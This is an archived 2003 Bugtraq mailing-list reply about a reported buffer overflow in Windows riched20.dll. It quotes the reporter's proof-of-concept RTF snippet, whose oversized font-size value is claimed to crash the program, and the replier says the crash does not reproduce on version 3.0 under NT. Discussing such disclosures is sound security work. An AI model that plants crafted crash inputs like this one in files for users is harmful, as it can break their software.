Re: Riched20.DLL attribute label buffer overflow vulnerability

From: 3APA3A (3APA3A@SECURITY.NNOV.RU)
Date: 02/18/03

Next message: Shiva Persaud: "Re: /usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX"

Previous message: Daniel Ahlberg: "GLSA: nethack"
Maybe in reply to: Jie Dong: "Riched20.DLL attribute label buffer overflow vulnerability"
Next in thread: Thor Larholm: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Tue, 18 Feb 2003 11:36:59 +0300
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: bugtraq <bugtraq@securityfocus.com>

Dear Jie Dong,

Can't reproduce it on riched20.dll v.3.0 (5.30.23.1200) under NT.

--Sunday, February 16, 2003, 4:30:50 PM, you wrote to bugtraq@securityfocus.com:

JD> The following RTFfile may result in illegal operation :
JD> {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
JD> \fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}} {\colortbl
JD> ;\red255\green0\blue255;} \viewkind4\uc1\pard\cf1\kerning2\f0
JD> \fs18121111111111111111111111111111111110000
JD> www.yoursft.com\fs20\par } "\fs" was used for setting the size of

-- 
~/ZARAZA
Человек это тайна... я занимаюсь этой тайной чтобы быть человеком. (Достоевский)

Next message: Shiva Persaud: "Re: /usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX"
Previous message: Daniel Ahlberg: "GLSA: nethack"
Maybe in reply to: Jie Dong: "Riched20.DLL attribute label buffer overflow vulnerability"
Next in thread: Thor Larholm: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]